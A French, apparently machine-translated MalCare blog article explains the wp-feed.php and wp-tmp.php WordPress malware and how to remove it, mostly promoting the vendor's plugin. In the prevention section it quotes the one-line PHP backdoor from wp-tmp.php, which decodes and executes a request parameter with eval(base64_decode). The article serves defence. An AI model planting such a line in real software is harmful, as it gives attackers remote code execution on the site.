Correction des logiciels malveillants Wp-Feed.php et Wp-Tmp.php dans WordPress - MalCare

Publié: 2023-04-19

Votre scanner de logiciels malveillants vous alerte-t-il que « votre site est piraté », mais cela vous semble correct ?

Les visiteurs se plaignent des spams sur votre site WordPress mais vous n'en voyez pas ?

Il y a de fortes chances que votre site soit piraté.

Les pirates trouvent des moyens astucieux de dissimuler leurs hacks aux propriétaires de sites afin qu'ils ne soient pas détectés et qu'ils puissent continuer à exploiter le site Web pendant longtemps.

Le wp-feed.php est l'un des hacks les plus intelligemment déguisés.

Caché aux propriétaires du site, il affiche des publicités pour des produits illégaux, des drogues et du contenu pour adultes à vos visiteurs.

Même si vous pouviez le détecter, trouver tous les endroits où l'infection s'est propagée est non seulement difficile mais parfois impossible. L'élimination de l'infection est compliquée et difficile. Si vous parvenez à l'enlever, dans 8 cas sur 10, l'infection réapparaît.

Conclusion : il est difficile de supprimer une infection wp-feed.php d'un site WordPress.

Heureusement, nous avons déjà eu affaire à ce logiciel malveillant un nombre incalculable de fois auparavant. Au cours de la dernière décennie, nous avons non seulement réussi à supprimer wp-feed de centaines et de milliers de sites Web WordPress, mais nous avons également empêché les réinfections.

Ne t'inquiète pas. Vous êtes entre de bonnes mains.

Dans cet article, vous apprendrez :

  • Fonctionnement du logiciel malveillant wp-feed.php et impact sur votre site Web
  • Comment le supprimer de votre site
  • Comment prévenir les réinfections à l'avenir

TL;DR : Pour supprimer l'infection wp-feed.php, il vous suffit d'installer notre WordPress Malware Removal et d'exécuter la fonction Auto-Clean. Le plugin aide également à prévenir la réinfection en supprimant les portes dérobées du site Web qui permettent la réinfection et empêchent le trafic malveillant d'accéder à votre site avec un pare-feu et une protection de connexion.

Qu'est-ce que wp-feed.php & wp-tmp.php ? (Causes, symptômes et réinfections)

En un mot : WP-Feed est un type de logiciel malveillant qui affiche des publicités malveillantes sur les sites Web. Le but est d'amener vos visiteurs à cliquer sur les publicités et à les rediriger vers un site Web malveillant.

Vous devez vous demander -

> Comment mon site Web a-t-il été infecté ?

L'infection est généralement causée par l'utilisation de plugins ou de thèmes annulés .

Les logiciels Nulled sont tentants à utiliser car ils vous offrent gratuitement des fonctionnalités premium. Beaucoup pensent que les logiciels annulés sont distribués comme un acte de bienveillance.

C'est généralement loin d'être le cas. Le logiciel Nulled est distribué afin que les pirates puissent accéder à votre site sans effort.

Les plugins ou thèmes annulés regorgent de logiciels malveillants. Lorsque vous installez un thème ou un plug-in annulé sur votre site Web, vous ouvrez essentiellement des portes aux pirates pour accéder à votre site.

Outre les logiciels annulés, les plugins et thèmes obsolètes peuvent également être vulnérables. Les pirates exploitent ces vulnérabilités pour s'introduire dans votre site.

Ils exploitent également des noms d'utilisateur et des mots de passe faibles comme "admin" et "p@ssword". Les informations d'identification faibles sont faciles à deviner.

Un pirate informatique peut deviner votre nom d'utilisateur et votre identifiant, et implanter directement le malware wp-feed.php sur votre site Web.

> Pourquoi les pirates infectent-ils les sites avec wp-feed.php ?

L'objectif est de voler vos visiteurs et de les inciter à acheter de faux services ou produits afin que les pirates puissent générer des revenus.

Ce qui est vraiment étonnant, c'est la façon dont ils sont souvent capables d'y parvenir sans que le propriétaire du site ne reçoive un seul indice.

Ce qui nous amène à la question -

> Pourquoi est-il difficile de remarquer les symptômes de cette infection ?

Une fois que les pirates ont accès à votre site Web, ils implantent deux fichiers (wp-feed.php et wp-tmp.php) dans votre dossier wp-includes.

Le dossier wp-includes fait partie de votre noyau WordPress. C'est là que se trouve le thème de votre site Web.

Le fichier de flux WP commence à infecter d'autres fichiers WordPress, en particulier function.php, qui fait partie de votre thème actif.

fonction.php filezilla

À partir de function.php, les pirates peuvent afficher des publicités contextuelles malveillantes sur votre site Web WordPress.

La partie vraiment diabolique est que les annonces ne sont diffusées qu'aux nouveaux visiteurs , pas aux visiteurs réguliers. Le logiciel malveillant enregistre les visiteurs de votre site pour s'assurer que seuls les nouveaux visiteurs voient les publicités. C'est un moyen ingénieux d'empêcher la détection.

logiciel malveillant wp-feed

Par conséquent, en tant que visiteur fréquent de votre propre site, vous ne remarquez jamais aucun symptôme de piratage.

Comment nettoyer les logiciels malveillants wp-feed.php ?

Il existe deux façons d'éliminer l'infection. Ce sont -

1. Utiliser un plugin (facile)

2. Le faire manuellement (difficile)

Plongeons dans chaque méthode.

1. Suppression du logiciel malveillant WP-Feed.php avec un plugin (méthode simple)

Certains d'entre vous ont peut-être déjà installé un plugin de sécurité sur votre site Web. C'est probablement ce plugin qui vous a alerté sur les fichiers malveillants - wp-includes/wp-feed.php et wp-includes/wp-tmp.php .

La plupart des plugins de sécurité offrent des services de suppression de logiciels malveillants, mais très peu peuvent le faire rapidement et aussi efficacement que MalCare Security.

  • MalCare nettoiera votre site en moins de 60 secondes . Vous n'avez pas à lever de ticket. Vous n'avez pas à attendre dans une file d'attente. Vous n'avez pas à remettre les informations d'identification de votre site à un plugin tiers.
  • Non seulement cela, le plugin va au-delà dans tous les coins et recoins, à la recherche de logiciels malveillants cachés. Il trouve chaque script malveillant présent sur votre site.
  • Il utilise des méthodes non traditionnelles pour détecter les logiciels malveillants nouveaux et bien cachés . Il analyse en profondeur le comportement du code pour identifier les intentions malveillantes. Cela permet également de s'assurer qu'il ne marque pas le bon code comme mauvais .
  • Il fait tout cela en l'espace de quelques minutes .

Nettoyons l'infection wp-feed.php avec MalCare.

Étape 1 : Installez et activez MalCare Security sur votre site WordPress.

Étape 2 : Dans le menu de votre tableau de bord, sélectionnez MalCare. Entrez votre adresse e-mail et cliquez sur Secure Site Now .

malcare site sécurisé maintenant

Étape 3 : Sur la page suivante, il vous sera demandé d' entrer un mot de passe, puis d' entrer votre URL .

MalCare commencera immédiatement à analyser votre site Web. Le but est de trouver chaque instance de code malveillant présent sur votre site Web.

Cela signifie qu'il ne détectera pas seulement les fichiers wp-feed.php et wp-tmp.php, mais tout le code malveillant infectant vos fichiers WordPress, y compris les instances cachées dans le fichier function.php.

Vous pouvez être assuré que le plugin trouvera également chaque porte dérobée présente sur votre site, afin d'éviter les réinfections.

ajouter un site

Après avoir trouvé les scripts malveillants, le plugin vous en avertira.

Ensuite, vous devez nettoyer votre site.

la sécurité des soins

Veuillez noter que la suppression des logiciels malveillants de MalCare est une fonctionnalité premium. C'est le seul plugin de suppression instantanée de logiciels malveillants. Pour 99 $ par an, vous pouvez nettoyer un seul site autant de fois que vous le souhaitez et être sûr de la meilleure protection possible. En savoir plus sur la tarification MalCare .

Étape 4 : Pour supprimer toute trace de wp-feed.php de votre site Web, il vous suffit de cliquer sur le bouton Auto-Clean .

MalCare commencera à nettoyer votre site instantanément.

nettoyage automatique malcare

C'est tout, les amis. C'est ainsi que vous nettoyez votre site Web avec un plugin.

2. Supprimer manuellement les logiciels malveillants WP-Feed.php (manière difficile)

L'élimination manuelle de l'infection est assez difficile, car, dans ce type d'infection, il y a beaucoup de pièces mobiles.

  • Le pirate télécharge deux fichiers malveillants - wp-feed.php et wp-tmp.php. Vous devez les supprimer pour commencer. C'est probablement le seul morceau facile.
  • L'infection se propage à d'autres fichiers WordPress, y compris le fichier function.php. C'est difficile, car qui peut dire où l'infection s'est propagée.
    • Il vous faudra des heures pour trouver tout le code malveillant.
    • Il est difficile de reconnaître le code malveillant car il est bien déguisé et ressemble à des morceaux de code normaux.
    • Certains codes malveillants connus, comme « eval(base64_decode) », peuvent faire partie de plugins légitimes. Ils ne sont pas utilisés de manière malveillante. Par conséquent, la suppression du code affectera votre plugin et pourrait même casser votre site.
    • Il y a de fortes chances que vous manquiez des morceaux de code pouvant entraîner des réinfections.

La suppression manuelle n'est donc pas du tout efficace.

Cependant, si vous souhaitez toujours le faire, veuillez effectuer une sauvegarde complète de votre site Web. Si vous finissez par supprimer accidentellement quelque chose et casser votre site, vous pouvez rapidement le restaurer à la normale.

Voici une liste des meilleurs services de sauvegarde pour lesquels vous pouvez opter.

Et voici un article qui vous aidera à supprimer manuellement le logiciel malveillant – WordPress piraté. Passez simplement à la section "Comment nettoyer manuellement un site Web WordPress piraté" .

Votre site Web est maintenant exempt d'infection, mais il est loin d'être sécurisé. Les pirates peuvent toujours cibler votre site et tenter de l'infecter. Vous devez vous assurer que votre site est protégé contre toute infection future. Mais avant d'entrer dans les détails, examinons l'impact de l'infection wp-feed.php & wp-tmp.php.

Impact de l'infection par le logiciel malveillant wp-temp.php

Inutile de dire que la présence des logiciels malveillants wp-feed.php et wp-tmp.php peut avoir un impact dévastateur sur votre site Web.

Les sites Web qui ont été infectés par wp-temp.php subiront souvent les conséquences suivantes :

  • Vous remarquerez une augmentation du taux de rebond et une diminution du temps que les visiteurs passent sur votre site Web.
  • Les publicités contextuelles rendront votre site Web lourd et très lent .
  • Personne n'aime un site Web lent, donc les visiteurs sont susceptibles d' appuyer sur le bouton de retour avant que vos pages ne se chargent sur le navigateur. Cela aura un effet domino.
  • Les moteurs de recherche remarqueront la rapidité avec laquelle les gens quittent votre site. Ils concluront que vous n'offrez pas ce que les utilisateurs recherchent. Votre rang de Search Engine tombera .
  • Cela signifie que tous les efforts, le temps et l'argent que vous auriez pu dépenser pour vous classer plus haut dans les SERP sont gaspillés .

liste noire google

  • Les sites Web piratés sont mis sur liste noire par Google et suspendus par les hébergeurs. De plus, si les sites piratés exécutent des annonces Google, le compte AdWords sera suspendu. Tout cela conduira à plonger davantage dans le trafic.
  • De plus, les sites Web piratés doivent être nettoyés , ce qui peut être une affaire coûteuse si vous n'utilisez pas les bons outils.

La bonne nouvelle est que vous savez que votre site est piraté. Par conséquent, vous pouvez le nettoyer et arrêter l'impact.

Comment protéger votre site contre les logiciels malveillants wp-feed.php à l'avenir ?

Beaucoup de nos lecteurs ont peut-être essayé de supprimer le malware wp-feed.php de leurs sites, pour découvrir que le malware revient sans cesse.

Cela se produit parce qu'une porte dérobée est installée sur votre site. La plupart des portes dérobées sont extrêmement bien déguisées, à tel point qu'elles peuvent être ignorées en tant que code légitime par des développeurs amateurs.

Dans une section précédente, nous avons expliqué que les pirates insèrent deux fichiers, wp-feed.php et wp-tmp.php, dans le code de votre site Web. Le fichier wp-tmp.php agit comme une porte dérobée. Si vous ouvrez le fichier, vous trouverez un script qui ressemble à ceci -

 $p = $REQUEST$#91;”m”]; eval(base64_decode ($p));

La bonne nouvelle est que vous pouvez protéger votre site contre de futures tentatives de piratage en prenant les mesures suivantes :

1. Supprimez les logiciels nuls et arrêtez de les utiliser

Si vous utilisez un plug-in ou un thème annulé sur votre site Web, supprimez-le immédiatement .

Les pirates ont eu accès à votre site en utilisant un logiciel annulé en premier lieu. Peu importe à quel point vous nettoyez votre site, si vous ne supprimez pas les logiciels annulés, les pirates trouveront leur chemin dans votre site et implanteront des logiciels malveillants.

Si vous avez donné à vos utilisateurs la permission d'installer des plugins et des thèmes, assurez-vous qu'ils n'utilisent jamais de logiciel annulé.

En fait, il est préférable de s'entraîner à empêcher complètement l'installation de plugins et de thèmes avec l'aide de MalCare.

Tout ce que vous avez à faire est de vous connecter au tableau de bord de MalCare, de sélectionner votre site Web, de cliquer sur Apply Hardening et d'activer Block Plugin/Theme Installation.

bloquer l'installation du plugin ou du thème

2. Renforcez la sécurité de votre site

Vous pouvez empêcher les pirates d'implanter des fichiers malveillants tels que wp-feed.php dans vos dossiers WordPress en modifiant les autorisations de fichiers .

Les autorisations de fichiers sont un ensemble de règles qui déterminent qui peut accéder à quels fichiers. Vous pouvez empêcher les utilisateurs d'apporter des modifications au dossier wp-includes. Pour mieux comprendre les autorisations de fichiers, consultez ce guide : Autorisations de fichiers WordPress.

modifier le gestionnaire de fichiers d'autorisation

Vous pouvez également empêcher les pirates de modifier votre thème en désactivant l'éditeur de fichiers . Cela les empêchera d'injecter des publicités pop-up sur votre site Web. Vous pouvez le faire manuellement mais c'est risqué et déconseillé.

Si MalCare est déjà installé sur votre site, il vous suffit de cliquer sur un bouton pour désactiver l'éditeur de fichiers.

désactiver l'éditeur de fichiers

En savoir plus sur le durcissement de WordPress.

3. Gardez votre site Web à jour

Comme tout autre logiciel, les plugins et thèmes WordPress développent des vulnérabilités. Lorsque les développeurs découvrent cette vulnérabilité, ils créent rapidement un correctif et le publient sous la forme d'une mise à jour.

S'il y a un retard dans la mise en œuvre des mises à jour, cela met votre site en danger.

Les pirates sont doués pour exploiter les vulnérabilités . En fait, ils sont toujours à la recherche de sites Web présentant des vulnérabilités afin de pouvoir les utiliser pour accéder au site et infecter le site avec des logiciels malveillants.

Par conséquent, ne retardez jamais les mises à jour.

Vous pouvez en savoir plus sur les mises à jour de sécurité ici – Mises à jour de sécurité WordPress.

Voici un guide qui vous aidera à maintenir votre site à jour – Comment mettre à jour WordPress.

4. Appliquer l'utilisation d'informations d'identification solides

Le moyen le plus simple d'accéder à votre site Web est via votre page de connexion.

Le pirate a juste besoin de deviner avec succès vos informations d'identification d'utilisateur. En fait, ils conçoivent des robots capables d'essayer des centaines de combinaisons de noms d'utilisateur et de mots de passe en l'espace de quelques minutes. Si vous ou l'un de vos coéquipiers utilisez des informations d'identification faciles à deviner comme "admin" et "password123", il faudra 2 secondes aux bots pour pénétrer votre site. C'est ce qu'on appelle une attaque par force brute.

Il est important de s'assurer que chaque utilisateur de votre site Web utilise des noms d'utilisateur uniques et des mots de passe forts.

Vous pouvez même aller au-delà et mettre en place plusieurs mesures pour protéger votre page de connexion. Nous avons compilé une liste de mesures de sécurité de connexion WordPress que vous pouvez prendre.

5. Utilisez un pare-feu

Ne serait-ce pas formidable si vous pouviez empêcher les pirates d'atterrir même sur votre site Web en premier lieu ?

Un pare-feu est l'outil dont vous avez besoin.

Il enquête sur le trafic qui souhaite accéder à votre site. S'il détecte que le trafic provient d'une adresse IP malveillante, le pare-feu bloque rapidement le trafic.

De cette façon, il filtre les pirates et les bots.

Voici une liste des meilleurs pare-feu WordPress que vous pouvez activer sur votre site.

Cependant, si vous utilisez MalCare, vous avez déjà un pare-feu activé sur votre site.

pare-feu malcare

Et ensuite ?

Nous vous avons montré comment nettoyer votre site et comment vous assurer que vous ne serez plus jamais piraté.

Un conseil qui, selon nous, sauvera votre site Web d'un certain nombre de catastrophes est de faire des sauvegardes régulières de votre site Web.

Que votre site Web génère soudainement une erreur ou qu'il soit cassé, une sauvegarde vous aidera à réparer rapidement votre site temporairement.

Si vous vous abonnez à MalCare Security, vous pouvez également bénéficier d'un module de sauvegarde moyennant des frais supplémentaires. Contactez-nous pour en savoir plus.

Essayez le plugin de sécurité MalCare !